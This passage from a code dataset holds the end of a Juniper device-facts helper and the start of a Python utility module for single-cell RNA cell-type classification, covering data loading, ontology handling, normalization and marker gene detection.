Raises exception in case of failure.\n \"\"\"\n response = self.handle.rpc.get_configuration(\n {'database': 'committed'}\n )\n if node == 'primary':\n node = 'node0'\n elif node == 'slave':\n node = 'node1'\n response = response.findall('groups[name=\"{0}\"]'.format(node))\n fxp0_data = response[0].find('interfaces/interface[name=\"fxp0\"]')\n if fxp0_data is not None:\n host_ip = fxp0_data.find('unit/family/inet/address/name').text\n if not host_ip:\n raise TobyException('Could not determined management IP')\n #host_ip = host_ip.split('/')[0]\n return host_ip\n\n def system_facts(self):\n \"\"\"\n Returns systems facts dictionary\n \"\"\"\n if self.series in ('SRX', 'VSRX'):\n response = self._get_srx_facts()\n else:\n node_info = self._get_juniper_node_facts()\n response = {'primary': node_info}\n from pprint import pprint\n pprint(response)\n return response\n\n def pyez_facts(self):\n \"\"\"\n Returns pyEZ handle facts\n \"\"\"\n self.handle.facts_refresh()\n return self.handle.facts\n\n def close(self):\n \"\"\"\n Close the connection\n \"\"\"\n self.handle.close()\n return True\n","sub_path":"NITA/lib/jnpr/toby/hldcl/device_data.py","file_name":"device_data.py","file_ext":"py","file_size_in_byte":14610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"140646405","text":"from anndata import read_h5ad\nimport sys\nfrom time import time\nfrom scipy import stats, sparse\nimport numpy as np\nimport collections\nimport pickle\nimport scipy\nfrom sklearn.preprocessing import normalize\nimport os\nfrom collections import Counter\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score,accuracy_score,precision_recall_fscore_support, cohen_kappa_score, auc, average_precision_score,f1_score,precision_recall_curve\nimport time\nimport psutil\nimport umap\nimport copy\nfrom sklearn import preprocessing\nfrom fbpca import pca\nfrom sklearn.metrics import roc_auc_score, roc_curve\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom scanorama import VERBOSE, KNN, ALPHA, APPROX, SIGMA\n#from libs import *\nfrom scanorama import find_alignments,merge_datasets,process_data,transform,vstack\nfrom sklearn.utils.graph_shortest_path import graph_shortest_path\nfrom scipy.sparse.linalg import svds, eigs\n\ndef print_memory_usage(loc):\n\t\"\"\"\n\tReturns the CPU and RAM usage for the system. Takes a string argument to indicate where in the\n\tprogram the memory usage is being computed.\n\t\"\"\"\n\tprint(\"Memory info\", loc)\n\tprint(\"\\tCPU usage:\", psutil.cpu_percent(), \"%\")\n\tprint(\"\\tRAM usage:\", psutil.virtual_memory()[2], \"%\")\n\tprint(\"\\t\\tYou have\", psutil.virtual_memory()[1] / 1000000000.0, \"GB available out of\",\n\t\t\t\t\t\tpsutil.virtual_memory()[0] / 1000000000.0, \"GB total\")\n\tprint()\n\n\ndef pickle_these_objects(a, b, c, d, e, f, filename='my_pickle.pickle'):\n\t\"\"\"\n\tUtility class for quickly pickling objects (takes up to 6 objects)\n\t\"\"\"\n\tdata = [a, b, c, d, e, f]\n\twith open(filename, \"wb\") as f:\n\t\tpickle.dump(len(data), f)\n\t\tfor value in data:\n\t\t\tpickle.dump(value, f)\n\n\ndef unpickle_from_file(filename='my_pickle.pickle'):\n\t\"\"\"\n\tUtility class for quickly unpickling objects. 
Returns a tuple of all the unpickled objects\n\t\"\"\"\n\tdata = []\n\twith open(filename, \"rb\") as f:\n\t\tfor i in range(pickle.load(f)):\n\t\t\tdata.append(pickle.load(f))\n\treturn tuple(data)\n\n\nnn_nhidden = [1000]\nrsts = [0.5,0.6,0.7,0.8]\ndfs_depth = 1\nco_dim = 5\nkeep_prob = 1.0\nuse_diagonal = True\nmax_iter = 20\nniter = 5\ndef translate_parameter(ps):\n\ts = []\n\tfor p in ps:\n\t\tif isinstance(p, list):\n\t\t\tp = [str(i) for i in p]\n\t\t\tp = '.'.join(p)\n\t\t\ts.append(p)\n\t\telse:\n\t\t\ts.append(str(p))\n\ts = '_'.join(s)\n\treturn s\npname = translate_parameter([max_iter])\n\n\ndef make_folder(folder):\n\tif not os.path.exists(folder):\n\t\tos.makedirs(folder)\n\treturn folder\n\n\ndef create_propagate_networks(dname, l2i, onto_net, cls2cls, ontology_nlp_file, ontology_nlp_emb_file = None, rsts = [0.5,0.6,0.7,0.8], diss=[2,3], thress=[1,0.8]):\n\tncls = np.shape(cls2cls)[0]\n\tif dname != 'allen':\n\t\t# create_nlp_networks requires the nlp embedding file as well, so pass it through here\n\t\tonto_net_nlp, onto_net_bin, stack_net_nlp, stack_net_bin, onto_net_nlp_all_pairs = create_nlp_networks(l2i, onto_net, cls2cls, ontology_nlp_file, ontology_nlp_emb_file)\n\t\t#network = create_consensus_networks(rsts, stack_net_nlp, onto_net_nlp_all_pairs, cls2cls)\n\t\tnetwork = create_consensus_networks(rsts, stack_net_nlp, onto_net_nlp_all_pairs, cls2cls, diss = diss, thress = thress)\n\telse:\n\t\tstack_net_bin = np.zeros((ncls,ncls))\n\t\tfor n1 in onto_net:\n\t\t\tfor n2 in onto_net[n1]:\n\t\t\t\tif n1==n2:\n\t\t\t\t\tcontinue\n\t\t\t\tstack_net_bin[n1,n2] = 1\n\t\t\t\tstack_net_bin[n2,n1] = 1\n\t\tnetwork = [RandomWalkRestart(stack_net_bin, rst) for rst in rsts]\n\treturn network\n\n\ndef fine_nearest_co_using_nlp(sentences,co2emb,obo_file,nlp_mapping_cutoff=0.8):\n\tco2name, name2co = get_ontology_name(obo_file = obo_file)\n\tfrom sentence_transformers import SentenceTransformer\n\tmodel = SentenceTransformer('bert-base-nli-mean-tokens')\n\tsentences = np.array([sentence.lower() for sentence in sentences])\n\tsentence_embeddings = model.encode(sentences)\n\tco_embeddings = []\n\tcos = []\n\tfor co in co2emb:\n\t\tco_embeddings.append(co2emb[co])\n\t\tcos.append(co)\n\tco_embeddings = np.array(co_embeddings)\n\tsent2co = {}\n\tfor sentence, embedding, ind in zip(sentences, sentence_embeddings, range(len(sentences))):\n\t\tscs = cosine_similarity(co_embeddings, embedding.reshape(1,-1))\n\n\t\tco_id = np.argmax(scs)\n\t\tsc = scs[co_id]\n\t\tif sc>nlp_mapping_cutoff:\n\t\t\tsent2co[sentence.lower()] = cos[co_id]\n\t\t\tnames = set()\n\t\t\tfor name in name2co:\n\t\t\t\tif name2co[name].upper() == cos[co_id]:\n\t\t\t\t\tnames.add(name)\n\t\t\t#print (sentence, cos[co_id], sc, co2name[cos[co_id]],names)\n\treturn sent2co\n\n\ndef ImputeUnseenCls(y_vec, y_raw, cls2cls, nseen, knn=1):\n\tnclass = np.shape(cls2cls)[0]\n\tseen2unseen_sim = cls2cls[:nseen, nseen:]\n\tnngh = np.argsort(seen2unseen_sim*-1, axis = 0)[0,:]\n\tncell = len(y_vec)\n\ty_mat = np.zeros((ncell, nclass))\n\ty_mat[:,:nseen] = y_raw[:, :nseen]\n\tfor i in range(ncell):\n\t\tif y_vec[i] == -1:\n\t\t\t#kngh = np.argsort(y_raw[i,:nseen]*-1)[0:knn]\n\t\t\t#if len(kngh) == 0:\n\t\t\t#\tcontinue\n\t\t\ty_mat[i,nseen:] = y_mat[i,nngh]\n\t\t\ty_mat[i,:nseen] -= 1000000\n\treturn y_mat\n\n\ndef ImputeUnseenCls_Backup(y_vec, y_raw, cls2cls, nseen, knn=1):\n\tnclass = np.shape(cls2cls)[0]\n\tseen2unseen_sim = cls2cls[:nseen, nseen:]\n\tncell = len(y_vec)\n\ty_mat = np.zeros((ncell, nclass))\n\ty_mat[:,:nseen] = y_raw[:, :nseen]\n\tfor i in range(ncell):\n\t\tif y_vec[i] == -1:\n\t\t\tkngh = np.argsort(y_raw[i,:nseen]*-1)[0:knn]\n\t\t\tif len(kngh) == 
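A minimal round-trip sketch for the two pickle helpers defined above; the file name is arbitrary and the data is synthetic:

import pickle

# pickle_these_objects always writes six slots, so pad unused ones with None;
# unpickle_from_file then returns all six as a tuple.
a, b = {'k': 1}, [1, 2, 3]
pickle_these_objects(a, b, None, None, None, None, filename='demo.pickle')
a2, b2, *_ = unpickle_from_file('demo.pickle')
assert a2 == a and b2 == b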
0:\n\t\t\t\tcontinue\n\t\t\ty_mat[i,:nseen] -= 1000000\n\t\t\ty_mat[i,nseen:] = np.dot(y_raw[i,kngh], seen2unseen_sim[kngh,:])\n\treturn y_mat\n\n\ndef find_gene_ind(genes, common_genes):\n\tgid = []\n\tfor g in common_genes:\n\t\tgid.append(np.where(genes == g)[0][0])\n\tgid = np.array(gid)\n\treturn gid\n\n\ndef RandomWalkOntology(onto_net, l2i, ontology_nlp_file, ontology_nlp_emb_file, rst = 0.7):\n\tncls = len(l2i)\n\tonto_net_nlp, _, onto_nlp_emb = read_cell_ontology_nlp(l2i, ontology_nlp_file, ontology_nlp_emb_file)\n\tonto_net_nlp = (cosine_similarity(onto_nlp_emb) + 1 ) /2#1 - spatial.distance.cosine(onto_nlp_emb, onto_nlp_emb)\n\tonto_net_mat = np.zeros((ncls, ncls))\n\tfor n1 in onto_net:\n\t\tfor n2 in onto_net[n1]:\n\t\t\tif n1==n2:\n\t\t\t\tcontinue\n\t\t\tonto_net_mat[n1,n2] = onto_net_nlp[n1, n2]\n\t\t\tonto_net_mat[n2,n1] = onto_net_nlp[n2, n1]\n\tonto_net_rwr = RandomWalkRestart(onto_net_mat, rst)\n\treturn onto_net_rwr\n\n\ndef process_expression(c2g_list):\n\t#this data process function is motivated by ACTINN, please check ACTINN for more information.\n\tc2g = np.vstack(c2g_list)\n\tc2g = c2g.T\n\t#print ('onclass d0',np.shape(c2g))\n\tc2g = c2g[np.sum(c2g, axis=1)>0, :]\n\t#print (c2g)\n\t#print ('onclass d1',np.shape(c2g))\n\tc2g = np.divide(c2g, np.sum(c2g, axis=0, keepdims=True)) * 10000\n\tc2g = np.log2(c2g+1)\n\texpr = np.sum(c2g, axis=1)\n\t#total_set = total_set[np.logical_and(expr >= np.percentile(expr, 1), expr <= np.percentile(expr, 99)),]\n\n\tc2g = c2g[np.logical_and(expr >= np.percentile(expr, 1), expr <= np.percentile(expr, 99)),]\n\t#print (c2g)\n\t#print ('onclass d2',np.shape(c2g))\n\tcv = np.std(c2g, axis=1) / np.mean(c2g, axis=1)\n\tc2g = c2g[np.logical_and(cv >= np.percentile(cv, 1), cv <= np.percentile(cv, 99)),]\n\t#print (c2g)\n\t#print ('onclass d3',np.shape(c2g))\n\tc2g = c2g.T\n\t#print (c2g)\n\t#print ('onclass d4',np.shape(c2g))\n\tc2g_list_new = []\n\tindex = 0\n\tfor c in c2g_list:\n\t\tncell = np.shape(c)[0]\n\t\tc2g_list_new.append(c2g[index:index+ncell,:])\n\t\tindex += ncell # advance the slice offset past this dataset's cells\n\treturn c2g_list_new\n\n\ndef read_ontology_file(dname, data_folder):\n\tif 'allen' in dname:\n\t\tcell_type_network_file = data_folder + 'allen.ontology'\n\t\tcell_type_nlp_emb_file = None\n\t\tcl_obo_file = None\n\t\tif not os.path.isfile(cell_type_network_file):\n\t\t\tsys.exit(cell_type_network_file + ' not found!')\n\telse:\n\t\tcell_type_network_file = data_folder + 'cl.ontology'\n\t\tcell_type_nlp_emb_file = data_folder + 'cl.ontology.nlp.emb'\n\t\tcl_obo_file = data_folder + 'cl.obo'\n\t\tif not os.path.isfile(cell_type_nlp_emb_file):\n\t\t\tsys.exit(cell_type_nlp_emb_file + ' not found!')\n\t\tif not os.path.isfile(cell_type_network_file):\n\t\t\tsys.exit(cell_type_network_file + ' not found!')\n\t\tif not os.path.isfile(cl_obo_file):\n\t\t\tsys.exit(cl_obo_file + ' not found!')\n\treturn cell_type_nlp_emb_file, cell_type_network_file, cl_obo_file\n\n\ndef read_data_file(dname, data_dir):\n\tif 'microcebus' in dname:\n\t\ttech = '10x'\n\t\tfeature_file = data_dir + 'Lemur/' + dname +'.h5ad'\n\t\tfilter_key={'method':tech }\n\t\tlabel_file = None\n\t\tgene_file = ''\n\t\tlabel_key = 'cell_ontology_class'\n\telif 'muris' in dname:\n\t\ttech = dname.split('_')[1]\n\t\tfeature_file = data_dir + 'Tabula_Muris_Senis/' + 'tabula-muris-senis-'+tech+'-official-raw-obj.h5ad'\n\t\tfilter_key = {}\n\t\tlabel_file = None\n\t\tgene_file = ''\n\t\tbatch_key = ''\n\t\tlabel_key = 'cell_ontology_class'\n\telif 'sapiens' in dname:\n\t\tfeature_file = data_dir + 'sapiens/' 
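A toy check of the scaling step inside process_expression, using only numpy: after the transpose, each cell (column) is scaled to a total of 10,000 counts before the log2(x+1) transform:

import numpy as np

counts = np.array([[100., 300.],
                   [900., 700.]])              # 2 genes x 2 cells
scaled = counts / counts.sum(axis=0, keepdims=True) * 10000
assert np.allclose(scaled.sum(axis=0), 10000)  # every cell now sums to 10,000
logged = np.log2(scaled + 1)                   # same transform as process_expression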
+ 'Pilot1_Pilot2_decontX_Oct2020.h5ad'\n\t\tfilter_key = {}\n\t\tlabel_file = None\n\t\tgene_file = ''\n\t\tbatch_key = ''\n\t\tlabel_key = 'cell_ontology_type'\n\telif 'allen' in dname:\n\t\tfeature_file = data_dir + '/Allen_Brain/features.pkl'\n\t\tlabel_file = data_dir + '/Allen_Brain/labels.pkl'\n\t\tgene_file = data_dir + '/Allen_Brain/genes.pkl'\n\t\tlabel_key = ''\n\t\tfilter_key = {}\n\telif 'krasnow' in dname:\n\t\ttech = dname.split('_')[1]\n\t\tfeature_file = data_dir + '/HLCA/'+tech+'_features.pkl'\n\t\tlabel_file = data_dir + '/HLCA/'+tech+'_labels.pkl'\n\t\tgene_file = data_dir + '/HLCA/'+tech+'_genes.pkl'\n\t\tlabel_key = ''\n\t\tfilter_key = {}\n\telse:\n\t\tsys.exit('wrong dname '+dname)\n\tif feature_file.endswith('.pkl'):\n\t\treturn feature_file, filter_key, label_key, label_file, gene_file\n\telif feature_file.endswith('.h5ad'):\n\t\treturn feature_file, filter_key, label_key, label_file, gene_file\n\tsys.exit('wrong file suffix')\n\n\ndef read_singlecell_data(dname, data_dir, ontology_dir, nsample = 500000000, read_tissue = False, exclude_non_leaf_ontology = True):\n\tif 'microcebus' in dname:\n\t\ttech = '10x'\n\t\t#file = data_dir + 'TMS_official_060520/' + 'tabula-microcebus_smartseq2-10x_combined_annotated_filtered_gene-labels-correct.h5ad'\n\t\tfile = data_dir + 'TMS_official_060520/' + dname +'.h5ad'\n\t\tfilter_key={'method':tech }\n\t\tbatch_key = ''#original_channel\n\t\tontology_nlp_file = ontology_dir + '/cell_ontology/cl.ontology.nlp'\n\t\tontology_file = ontology_dir + '/cell_ontology/cl.ontology'\n\t\tcl_obo_file = ontology_dir + '/cell_ontology/cl.obo'\n\t\tif not read_tissue:\n\t\t\tfeature, label, genes = parse_h5ad(file, nsample = nsample, read_tissue = read_tissue, label_key='cell_ontology_class', batch_key = batch_key, filter_key = filter_key, cell_ontology_file = ontology_file, exclude_non_leaf_ontology = exclude_non_leaf_ontology, exclude_non_ontology = True, cl_obo_file = cl_obo_file)\n\t\telse:\n\t\t\tfeature, label, genes, tissues = parse_h5ad(file, nsample = nsample, read_tissue = read_tissue, label_key='cell_ontology_class', batch_key = batch_key, filter_key = filter_key, cell_ontology_file = ontology_file, exclude_non_leaf_ontology = exclude_non_leaf_ontology, exclude_non_ontology = True, cl_obo_file = cl_obo_file)\n\telif 'muris' in dname:\n\t\ttech = dname.split('_')[1]\n\t\tfile = data_dir + 'TMS_official_060520/' + 'tabula-muris-senis-'+tech+'-official-raw-obj.h5ad'\n\t\tfilter_key = {}\n\t\tbatch_key = ''\n\t\tontology_nlp_file = ontology_dir + '/cell_ontology/cl.ontology.nlp'\n\t\tontology_file = ontology_dir + '/cell_ontology/cl.ontology'\n\t\tcl_obo_file = ontology_dir + '/cell_ontology/cl.obo'\n\t\tif not read_tissue:\n\t\t\tfeature, label, genes = parse_h5ad(file, nsample = nsample, read_tissue = read_tissue, label_key='cell_ontology_class', batch_key = batch_key, cell_ontology_file = ontology_file, filter_key=filter_key, exclude_non_leaf_ontology = exclude_non_leaf_ontology, exclude_non_ontology = True, cl_obo_file = cl_obo_file)\n\t\telse:\n\t\t\tfeature, label, genes, tissues = parse_h5ad(file, nsample = nsample, read_tissue = read_tissue, label_key='cell_ontology_class', batch_key = batch_key, cell_ontology_file = ontology_file, filter_key=filter_key, exclude_non_leaf_ontology = exclude_non_leaf_ontology, exclude_non_ontology = True, cl_obo_file = cl_obo_file)\n\telif 'allen_part' in dname:\n\t\tfeature_file = data_dir + 'Allen/matrix_part.csv'\n\t\tlabel_file = data_dir + 'Allen/metadata.csv'\n\t\tontology_file = data_dir + 
'Allen/cell_type_ontology'\n\t\tontology_nlp_file = None\n\t\tfeature, label, genes = parse_csv(feature_file, label_file, nsample = nsample, label_key='cell_type_accession_label', exclude_non_ontology = True, exclude_non_leaf_ontology = True, cell_ontology_file=ontology_file)\n\telif 'allen' in dname:\n\t\tfeature_file = data_dir + 'Allen/features.pkl'\n\t\tlabel_file = data_dir + 'Allen/labels.pkl'\n\t\tgene_file = data_dir + 'Allen/genes.pkl'\n\t\tontology_file = data_dir + 'Allen/cell_type_ontology'\n\t\tontology_nlp_file = None\n\t\tfeature, label, genes = parse_pkl(feature_file, label_file, gene_file, nsample = nsample, exclude_non_leaf_ontology = True, cell_ontology_file=ontology_file)\n\telif 'krasnow' in dname:\n\t\ttech = dname.split('_')[1]\n\t\tfeature_file = data_dir + 'Krasnow/'+tech+'_features.pkl'\n\t\tlabel_file = data_dir + 'Krasnow/'+tech+'_labels.pkl'\n\t\tgene_file = data_dir + 'Krasnow/'+tech+'_genes.pkl'\n\t\tontology_file = ontology_dir + '/cell_ontology/cl.ontology'\n\t\tontology_nlp_file = ontology_dir + '/cell_ontology/cl.ontology.nlp'\n\t\tcl_obo_file = ontology_dir + '/cell_ontology/cl.obo'\n\t\tfeature, label, genes = parse_pkl(feature_file, label_file, gene_file, nsample = nsample, exclude_non_leaf_ontology = True, cell_ontology_file=ontology_file)\n\telse:\n\t\tsys.exit('wrong dname '+dname)\n\tif read_tissue:\n\t\treturn feature, label, genes, tissues, ontology_nlp_file, ontology_file\n\telse:\n\t\treturn feature, label, genes, ontology_nlp_file, ontology_file\n\n\ndef parse_krasnow(feature_file, label_file, gene_file, seed = 1, nsample = 1000,exclude_non_leaf_ontology = True, exclude_non_ontology = True, cell_ontology_file=None):\n\tnp.random.seed(seed)\n\n\tif feature_file.endswith('.pkl'):\n\t\tfeatures = pickle.load(open(feature_file, 'rb'))\n\t\tlabels = pickle.load(open(label_file, 'rb'))\n\t\tgenes = pickle.load(open(gene_file, 'rb'))\n\t\tncell, ngene = np.shape(features)\n\t\tassert(ncell == len(labels))\n\t\tassert(ngene == len(genes))\n\t\tindex = np.random.choice(ncell,min(nsample,ncell),replace=False)\n\t\tfeatures = features[index, :]\n\t\tlabels = labels[index]\n\tif exclude_non_leaf_ontology:\n\t\tnew_ids, exclude_terms = exclude_parent_child_nodes(cell_ontology_file, labels)\n\t\t#print (len(exclude_terms),'non leaf terms are excluded')\n\t\tfeatures = features[new_ids, :]\n\t\tlabels = labels[new_ids]\n\tgenes = [x.upper() for x in genes]\n\tgenes = np.array(genes)\n\treturn features, labels, genes\n\n\ndef parse_pkl(feature_file, label_file, gene_file, seed = 1, nsample = 10000000,exclude_non_leaf_ontology = True, cell_ontology_file=None):\n\tnp.random.seed(seed)\n\tif feature_file.endswith('.pkl'):\n\t\tfeatures = pickle.load(open(feature_file, 'rb'))\n\t\tlabels = pickle.load(open(label_file, 'rb'))\n\t\tgenes = pickle.load(open(gene_file, 'rb'))\n\t\tncell, ngene = np.shape(features)\n\t\tassert(ncell == len(labels))\n\t\tassert(ngene == len(genes))\n\t\tindex = np.random.choice(ncell,ncell,replace=False)\n\t\tfeatures = features[index, :]\n\t\tlabels = labels[index]\n\tif exclude_non_leaf_ontology:\n\t\tnew_ids, exclude_terms = exclude_parent_child_nodes(cell_ontology_file, labels)\n\t\t#print (len(exclude_terms),'non leaf terms are excluded')\n\t\tfeatures = features[new_ids, :]\n\t\tlabels = labels[new_ids]\n\tgenes = [x.upper() for x in genes]\n\tgenes = np.array(genes)\n\treturn features, labels, genes\n\n\ndef select_high_var_genes(train_X, test_X, ngene = 200):\n\tmat = np.vstack((train_X, test_X))\n\t#mat = mat.todense()\n\tgstd 
= np.std(mat, axis=0)\n\tbest_genes = np.argsort(gstd*-1)\n\tbest_genes = best_genes[:ngene]\n\treturn train_X[:, best_genes], test_X[:, best_genes]\n\n\ndef emb_cells(train_X, test_X, dim=20):\n\tif dim==-1:\n\t\treturn np.log1p(train_X.todense()), np.log1p(test_X.todense())\n\ttrain_X = np.log1p(train_X)\n\ttest_X = np.log1p(test_X)\n\ttrain_X = preprocessing.normalize(train_X, axis=1)\n\ttest_X = preprocessing.normalize(test_X, axis=1)\n\tntrain = np.shape(train_X)[0]\n\tmat = sparse.vstack((train_X, test_X))\n\tU, s, Vt = pca(mat, k=dim) # Automatically centers.\n\tX = U[:, range(dim)] * s[range(dim)]\n\treturn X[:ntrain,:], X[ntrain:,:]\n\n\ndef write_markers(fname, markers):\n\t## Write marker genes to file\n\tfmarker_genes = open(fname,'w')\n\tfor t in markers:\n\t\tfmarker_genes.write(t+'\\t')\n\t\tg2pv = sorted(markers[t].items(), key=lambda item: item[1])\n\t\tfor g,pv in g2pv:\n\t\t\tfmarker_genes.write(g+'(pv:'+'{:.2e}'.format(pv)+')\\t')\n\t\tfmarker_genes.write('\\n')\n\tfmarker_genes.close()\n\n\ndef calculate_markers(cell2term, cell2gene, genes, terms, topk_cells=500, only_over_expressed = True, return_k_genes = 100):\n\tncell, nterm = np.shape(cell2term)\n\tngene = np.shape(cell2gene)[1]\n\tassert(ncell == np.shape(cell2gene)[0])\n\tmarkers = collections.defaultdict(dict)\n\tfor t in range(nterm):\n\t\tscs = np.argsort(cell2term[:,t])\n\t\tk_bot_cells = scs[:topk_cells]\n\t\tk_top_cells = scs[ncell-topk_cells:]\n\t\tpv = scipy.stats.ttest_ind(cell2gene[k_top_cells,:], cell2gene[k_bot_cells,:], axis=0)[1] #* ngene\n\t\ttop_mean = np.mean(cell2gene[k_top_cells,:],axis=0)\n\t\tbot_mean = np.mean(cell2gene[k_bot_cells,:],axis=0)\n\t\tif only_over_expressed:\n\t\t\tfor g in range(ngene):\n\t\t\t\tif top_mean[g] < bot_mean[g]:\n\t\t\t\t\tpv[g] = 1.\n\t\tpv_sort = list(np.argsort(pv))\n\t\t#for i in range(return_k_genes):\n\t\t#markers[terms[t]][genes[pv_sort[i]]] = pv[pv_sort[i]]\n\t\tmarkers[terms[t]] = pv\n\t\tfor i,p in enumerate(pv):\n\t\t\tif np.isnan(p):\n\t\t\t\tpv[i] = 1.\n\t\t\t#markers[terms[t]][str(pv_sort[i])] = pv[pv_sort[i]]\n\treturn markers\n\ndef peak_h5ad(file):\n\t\"\"\"\n\tpeak the number of cells, classes, genes in h5ad file\n\t\"\"\"\n\tx = read_h5ad(file)\n\t#print (np.shape(x.X))\n\t#print (x.X[:10][:10])\n\t#print (x.obs.keys())\n\tncell, ngene = np.shape(x.X)\n\tnclass = len(np.unique(x.obs['free_annotation']))\n\t#print (np.unique(x.obs['free_annotation']))\n\tf2name = {}\n\tsel_cell = 0.\n\tfor i in range(ncell):\n\t\tif x.obs['method'][i]!='10x':\n\t\t\tcontinue\n\n\t\tfree = x.obs['free_annotation'][i]\n\t\tname = x.obs['cell_ontology_class'][i]\n\t\tf2name[free] = name\n\t\tsel_cell += 1\n\treturn sel_cell, ngene, nclass\n\n\ndef get_onotlogy_parents(GO_net, g):\n\tterm_valid = set()\n\tngh_GO = set()\n\tngh_GO.add(g)\n\twhile len(ngh_GO) > 0:\n\t\tfor GO in list(ngh_GO):\n\t\t\tfor GO1 in GO_net[GO]:\n\t\t\t\tngh_GO.add(GO1)\n\t\t\tngh_GO.remove(GO)\n\t\t\tterm_valid.add(GO)\n\treturn term_valid\n\n\ndef exclude_non_ontology_term(cl_obo_file, labels, label_key):\n\tco2name, name2co = get_ontology_name(cl_obo_file)\n\tnew_labs = []\n\tnew_ids = []\n\tif label_key!='cell_ontology_class' and label_key!='cell_ontology_id':\n\t\tuse_co = False\n\t\tfor kk in np.unique(labels):\n\t\t\tif kk.lower().startswith('cl:'):\n\t\t\t\tuse_co = True\n\t\t\t\tbreak\n\telse:\n\t\tif label_key == 'cell_ontology_class':\n\t\t\tuse_co = False\n\t\telse:\n\t\t\tuse_co = True\n\tfor i in range(len(labels)):\n\t\tl = labels[i]\n\t\tif not use_co:\n\t\t\tif l.lower() in 
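The core of calculate_markers is a two-sample t-test between the highest- and lowest-scoring cells for a term, keeping only over-expressed genes; a self-contained toy version on synthetic data:

import numpy as np
from scipy import stats

rng = np.random.default_rng(0)
top = rng.normal(2.0, 1.0, size=(50, 3))       # cells with high term scores
bot = rng.normal(0.0, 1.0, size=(50, 3))       # cells with low term scores
pv = stats.ttest_ind(top, bot, axis=0)[1]      # per-gene p-values
pv[top.mean(axis=0) < bot.mean(axis=0)] = 1.0  # drop under-expressed genes
marker_order = np.argsort(pv)                  # most significant genes first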
name2co.keys():\n\t\t\t\tnew_labs.append(name2co[l.lower()])\n\t\t\t\tnew_ids.append(i)\n\t\telse:\n\t\t\tif l.lower() in co2name.keys():\n\t\t\t\tnew_labs.append(l.lower())\n\t\t\t\tnew_ids.append(i)\n\tnew_labs = np.array(new_labs)\n\tnew_ids = np.array(new_ids)\n\treturn new_ids, new_labs\n\n\ndef parse_raw_h5ad(file,seed=1,nsample=1e10,tissue_key='tissue',label_key='cell_ontology_class', read_tissue = True, batch_key = '', filter_key={}, cell_ontology_file = None, exclude_non_leaf_ontology = True, exclude_non_ontology=True, cl_obo_file = None):\n\tnp.random.seed(seed)\n\tx = read_h5ad(file)\n\n\tncell = np.shape(x.raw.X)[0]\n\tselect_cells = set(range(ncell))\n\tfor key in filter_key:\n\t\tvalue = filter_key[key]\n\t\tselect_cells = select_cells & set(np.where(np.array(x.obs[key])==value)[0])\n\tselect_cells = sorted(select_cells)\n\tfeature = x.raw.X[select_cells, :]\n\tlabels = np.array(x.obs[label_key].tolist())[select_cells]\n\tif read_tissue:\n\t\ttissues = np.array(x.obs[tissue_key].tolist())[select_cells]\n\tif batch_key=='' or batch_key not in x.obs.keys():\n\t\tbatch_labels = np.ones(len(labels))\n\telse:\n\t\tbatch_labels = np.array(x.obs[batch_key].tolist())[select_cells]\n\tgenes = x.var.index\n\tncell = len(select_cells)\n\tif exclude_non_ontology:\n\t\tnew_ids, labels = exclude_non_ontology_term(cl_obo_file, labels, label_key)\n\t\tfeature = feature[new_ids, :]\n\t\tbatch_labels = batch_labels[new_ids]\n\tif exclude_non_leaf_ontology:\n\t\tnew_ids, exclude_terms = exclude_parent_child_nodes(cell_ontology_file, labels)\n\t\t#print (len(exclude_terms),'non leaf terms are excluded')\n\t\tfeature = feature[new_ids, :]\n\t\tbatch_labels = batch_labels[new_ids]\n\t\tlabels = labels[new_ids]\n\t\tif read_tissue:\n\t\t\ttissues = tissues[new_ids]\n\tncell = len(labels)\n\tindex = np.random.choice(ncell,min(nsample,ncell),replace=False)\n\tbatch_labels = batch_labels[index]\n\tfeature = feature[index, :] # cell by gene matrix\n\tlabels = labels[index]\n\tif read_tissue:\n\t\ttissues = tissues[index]\n\tgenes = x.var.index\n\tcorrected_feature = run_scanorama_same_genes(feature, batch_labels)\n\tcorrected_feature = corrected_feature.toarray()\n\tgenes = [x.upper() for x in genes]\n\tgenes = np.array(genes)\n\tif read_tissue:\n\t\tassert(len(tissues) == len(labels))\n\t\treturn corrected_feature, labels, genes, tissues\n\telse:\n\t\treturn corrected_feature, labels, genes\n\n\ndef select_cells_based_on_keys(x, features, tissues = None, labels = None, filter_key = None):\n\tncell = np.shape(x.X)[0]\n\tselect_cells = set(range(ncell))\n\tfor key in filter_key:\n\t\tvalue = filter_key[key]\n\t\tselect_cells = select_cells & set(np.where(np.array(x.obs[key])==value)[0])\n\tselect_cells = sorted(select_cells)\n\tfeatures = features[select_cells,: ]\n\tif labels is not None:\n\t\tlabels = labels[select_cells]\n\tif tissues is not None:\n\t\ttissues = tissues[select_cells]\n\tx = x[select_cells,:]\n\treturn features, labels, tissues, x\n\n\ndef find_marker_genes(train_X, pred_Y_all, genes, i2l, topk = 50):\n\tcor = corr2_coeff(pred_Y_all[:,:].T, train_X[:,:].T)\n\tcor = np.nan_to_num(cor) # cell type to gene\n\tnl = len(i2l)\n\tc2g = {}\n\tfor i in range(nl):\n\t\tgl = np.argsort(cor[i,:]*-1)\n\t\tc2g[i2l[i]] = {}\n\t\tfor j in range(topk):\n\t\t\tc2g[i2l[i]][genes[gl[j]]] = cor[i, gl[j]]\n\treturn c2g, cor\n\n\ndef use_pretrained_model(OnClass, genes, test_X, models = []):\n\tlast_l2i = {}\n\tlast_i2l = {}\n\n\tpred_Y_all_models = 0.\n\tngene = len(genes)\n\tfor model in 
